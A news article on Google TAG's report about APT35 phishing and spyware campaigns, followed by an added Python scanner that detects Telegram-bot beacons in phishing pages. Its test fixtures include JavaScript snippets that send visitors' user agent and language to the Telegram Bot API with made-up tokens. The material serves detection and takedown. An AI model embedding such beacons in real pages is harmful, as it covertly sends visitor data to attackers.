Iranian hacking group continues to target US citizens

APT35 used phishing attacks and uploaded spyware onto Google Play Store

An Iranian hacking group has been targeting US citizens and organizations since 2017 and doesn’t seem to be letting up, according to a new Google report.

Google's Threat Analysis Group said a state-backed Iranian group known as APT35 targeted high-value individuals in the US and elsewhere. The hackers, also known as Charming Kitten, Phosphorus, Ajax Security, and NewsBeef, have attacked high-value accounts in government, academia, journalism, NGOs, foreign policy, and national security since 2017. 

APT35 is also one of the groups that tried to disrupt the 2020 US election cycle by targeting campaign staffers. 

The group has hijacked accounts, deployed malware, and used novel techniques to conduct espionage aligned with the interests of the Iranian government, according to Google TAG team member Ajax Bash.

Earlier this year, the hackers compromised a website affiliated with a UK university to host a phishing kit.

“Attackers sent email messages with links to this website to harvest credentials for platforms such as Gmail, Hotmail, and Yahoo. Users were instructed to activate an invitation to a (fake) webinar by logging in. The phishing kit will also ask for second-factor authentication codes sent to devices,” said Bash.

Bash added that credential phishing through a compromised website demonstrates these attackers will go to great lengths to appear legitimate – “as they know it's difficult for users to detect this kind of attack”.

In May 2020, the team discovered that APT35 attempted to upload spyware to the Google Play Store. The app disguised itself as VPN software but, if installed, could steal sensitive information such as call logs, text messages, contacts, and location data from the device.

“Google detected the app quickly and removed it from the Play Store before any users had a chance to install it. Although Play Store users were protected, we are highlighting the app here as TAG has seen APT35 attempt to distribute this spyware on other platforms as recently as July 2021,” said Bash.

Among the most notable attacks by the Iranian hackers was the impersonation of conference officials to conduct phishing attacks. “Attackers used the Munich Security and the Think-20 (T20) Italy conferences as lures in non-malicious first contact email messages to get users to respond. When they did, attackers sent them phishing links in follow-on correspondence,” said Bash.


The group also uses Telegram for operator notifications. The attackers embed JavaScript in their phishing pages that alerts them when a page has been loaded: the script calls the Telegram Bot API's sendMessage method, which lets anyone controlling a bot post a message to a public channel.

“The attackers use this function to relay device-based data to the channel, so they can see details such as the IP, useragent, and locales of visitors to their phishing sites in real-time. We reported the bot to Telegram, and they have taken action to remove it,” said Bash.
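The beaconing behaviour described above leaves a recognisable fingerprint in page source, which is useful both for triaging a suspected phishing kit and for collecting the bot token and channel ID needed to report the bot. The scanner below is an added example written for this article; it is not Google TAG's code or anything recovered from the APT35 kit. The token format (a numeric bot ID, a colon, and a 35-character secret), the "-100" prefix on channel IDs, and the three sample pages are assumptions modelled on the behaviour the article describes; the tokens and IDs in the samples are made up.

```python
"""Detect a Telegram Bot API beacon in suspected phishing-page source and
extract the bot token and chat id (added example, not the original code)."""
import re
from dataclasses import dataclass, field

# Assumption: Telegram bot tokens look like "<numeric bot id>:<35-char secret>".
# The id directly follows "bot" in Bot API URLs, so only a digit may not precede it.
BOT_TOKEN_RE = re.compile(r"(?<!\d)(\d{8,10}:[A-Za-z0-9_-]{35})(?![\w-])")
# The beacon targets the Bot API host and the sendMessage method; the URL may be
# assembled from fragments, so the host and the method are matched separately.
TELEGRAM_HOST_RE = re.compile(r"api\.telegram\.org", re.I)
SEND_MESSAGE_RE = re.compile(r"sendMessage\b")
# chat_id passed as a query parameter or as a JSON/JS property with a literal value.
CHAT_ID_RE = re.compile(r"chat_id[\"']?\s*[=:]\s*[\"']?(-?\d{5,16})")
# Assumption: channel/supergroup ids are "-100" followed by ten digits; this catches
# ids that are only stored in a variable and never appear next to "chat_id".
CHANNEL_ID_RE = re.compile(r"(?<![\d-])(-100\d{10})(?!\d)")
# Visitor details the article says operators relay to the channel.
FINGERPRINT_RE = re.compile(r"navigator\.(?:userAgent|languages|language)")


@dataclass
class BeaconReport:
    beacons_to_telegram: bool
    bot_tokens: list = field(default_factory=list)
    chat_ids: list = field(default_factory=list)
    fingerprint_fields: list = field(default_factory=list)


def scan_page(content: str) -> BeaconReport:
    """Report whether the page source beacons to Telegram and what it leaks."""
    to_telegram = bool(TELEGRAM_HOST_RE.search(content)) and bool(SEND_MESSAGE_RE.search(content))
    tokens = sorted(set(BOT_TOKEN_RE.findall(content)))
    chat_ids = sorted(set(CHAT_ID_RE.findall(content)) | set(CHANNEL_ID_RE.findall(content)))
    fields = sorted({m.group(0) for m in FINGERPRINT_RE.finditer(content)})
    return BeaconReport(to_telegram, tokens, chat_ids, fields)


# Constructed sample 1: beacon as a single image-request URL with a literal token.
INLINE_BEACON_PAGE = """<html><body>
<form action="login.php" method="post"><input name="user"><input name="pass"></form>
<script>
new Image().src = "https://api.telegram.org/bot123456789:AAFabcdefghijklmnopqrstuvwxyz012345/sendMessage?chat_id=-1001234567890&text="
  + encodeURIComponent(navigator.userAgent + "|" + navigator.language);
</script></body></html>"""

# Constructed sample 2: token and chat id held in variables, POST body built with JSON.
VARIABLE_BEACON_PAGE = """<script>
var t = "987654321:AAGzyxwvutsrqponmlkjihgfedcba543210";
var c = "-1009876543210";
fetch("https://api.telegram.org/bot" + t + "/sendMessage",
      {method: "POST", body: JSON.stringify({chat_id: c, text: navigator.userAgent})});
</script>"""

# Constructed sample 3: an ordinary login page with no beacon.
BENIGN_PAGE = """<html><body><form action="/login" method="post">
<input name="user"><input name="pass"></form><script>console.log("ready");</script></body></html>"""


if __name__ == "__main__":
    for name, page in [("inline", INLINE_BEACON_PAGE), ("variable", VARIABLE_BEACON_PAGE), ("benign", BENIGN_PAGE)]:
        print(name, scan_page(page))
```

Run it against saved page source from a suspected kit; a hit with a token and a "-100…" chat ID gives you both the indicator to block and the details to hand to Telegram for takedown, which is the step the article says TAG took.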

So far this year, Google has warned more than 50,000 account holders that they may have been targeted by state-backed phishing or malware attempts, a nearly 33% increase on the same period in 2020.
